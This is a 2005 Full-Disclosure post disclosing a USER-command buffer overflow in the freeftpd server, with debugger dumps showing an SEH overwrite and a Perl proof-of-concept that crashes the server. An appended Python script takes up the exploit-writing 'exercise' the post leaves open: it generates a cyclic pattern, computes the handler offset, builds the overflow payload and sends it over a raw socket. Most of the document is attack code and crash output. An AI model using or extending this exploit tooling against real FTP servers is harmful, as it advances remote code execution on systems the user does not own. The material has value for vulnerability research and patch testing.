List: full-disclosure
Subject: [Full-disclosure] freeftpd USER bufferoverflow
From: barabas mutsonline <barbsie () gmail ! com>
Date: 2005-11-16 9:56:54
Message-ID: 981281b10511160156x26da1beco2bdd1547b809abe5 () mail ! gmail ! com
Hi,
While drooling over my new Adriana Lima wallpaper, my tongue accidentally
hit my keyboard and more than 1012 chars were sent to the login screen of my
freeftpd server (which I use to back up my Adriana Lima pics). Guess
what... the server crashed! Luckily I attach OllyDbg to every process I have
running and this is what I found:
ECX 50505050
EIP 77C460CB msvcrt.77C460CB
Log data, item 0
Address=77C460CB
Message=Access violation when reading [50505050]
77C460CB 8B01 MOV EAX,DWORD PTR DS:[ECX]
Well, EIP doesn't get overwritten, but SEH does:
0012B6CC 41414141
0012B6D0 42424242
0012B6D4 42424242
0012B6D8 43434343 Pointer to next SEH record
0012B6DC 47464544 SE handler
EIP 47464544
Log data, item 0
Address=47464544
Message=Access violation when executing [47464544]
I leave the exploit coding as an exercise...
enjoy
sample crash code:
#!/usr/bin/perl -w
# freeftpd USER buffer overflow
# barabas - 2005
use strict;
use Net::FTP;

# 1011 bytes of filler, then 4 bytes ("DEFG") that land on the SE handler,
# then 0x50 padding (ECX ends up as 0x50505050 in the crash above)
my $user = "\x41" x 1011;
$user   .= "\x44\x45\x46\x47";   # overwrite SEH
$user   .= "\x50" x 400;

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1)
    or die "cannot connect: $@";
$ftp->login($user, "whatevah");
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
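The offset-finding step the post leaves as an exercise, as an added example that is not part of the original message and not barabas's code: a Python 3 script that generates a Metasploit-style cyclic pattern, recovers the handler offset from the dword OllyDbg prints (the debugger shows it little-endian, which is why the bytes "DEFG" appear as 47464544), rebuilds the PoC layout, and sends it as an FTP USER over a raw socket. The host/port defaults, the minimal FTP client and the illustrative crash value 42376842 are assumptions; the 1011-byte filler, the DEFG marker and the 0x50 tail come from the post.

```python
"""
Offset recovery and payload builder for the freeftpd USER overflow crash.

Added example, not barabas's code. Host/port defaults, the FTP client and the
crash value used in __main__ are assumptions; the 1011-byte filler, the "DEFG"
handler marker and the 0x50 tail are taken from the post.
"""
import socket
import string
import struct

# Largest length the three-character cyclic pattern stays unique for: 26*26*10*3
MAX_PATTERN = 26 * 26 * 10 * 3


def cyclic_pattern(length):
    """Metasploit-style non-repeating pattern (Aa0Aa1Aa2...), truncated to length."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes is not unique" % MAX_PATTERN)
    out = bytearray()
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out += (upper + lower + digit).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(crash_value, length=MAX_PATTERN):
    """Offset in the pattern of the dword a 32-bit register or the SE handler shows.
    OllyDbg prints it little-endian (e.g. 47464544 for the bytes "DEFG"), so the
    value is packed "<I" before searching. Returns -1 if it is not from the pattern."""
    needle = struct.pack("<I", crash_value)
    return cyclic_pattern(length).find(needle)


def build_user_payload(filler_len=1011, handler=b"DEFG", tail=b"\x50" * 400):
    """Same layout as the Perl PoC: filler, 4 bytes that land on the SE handler, padding."""
    if len(handler) != 4:
        raise ValueError("handler marker must be exactly 4 bytes")
    return b"\x41" * filler_len + handler + tail


def handler_dword(payload, handler_offset=1011):
    """Little-endian dword at the handler offset, as the debugger would print it."""
    return struct.unpack("<I", payload[handler_offset:handler_offset + 4])[0]


def send_user(host="127.0.0.1", port=21, payload=None, timeout=5.0):
    """Minimal FTP client (assumption): read the banner, send USER <payload>,
    return the reply, or b"" if the server died without answering."""
    if payload is None:
        payload = build_user_payload()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.recv(1024)                                  # 220 banner
        sock.sendall(b"USER " + payload + b"\r\n")
        try:
            return sock.recv(1024)
        except (socket.timeout, ConnectionError):
            return b""


if __name__ == "__main__":
    # 1. crash the server with cyclic_pattern(2000) as the USER argument instead
    #    of "A"s and read the SE handler value from OllyDbg
    # 2. feed that value to pattern_offset(); 42376842 is a constructed example
    #    (pattern bytes "Bh7B" sitting on the handler), not a value from the post
    print(pattern_offset(0x42376842))                    # 1011
    # 3. rebuild the PoC layout and confirm the marker lands where the debugger showed it
    print(hex(handler_dword(build_user_payload())))      # 0x47464544 ("DEFG")
```

Run `send_user()` against a test VM with the debugger attached, never against a server you do not own; the script sends the whole username in one USER line, so it exercises the same code path as the Perl PoC without depending on a client library's length handling.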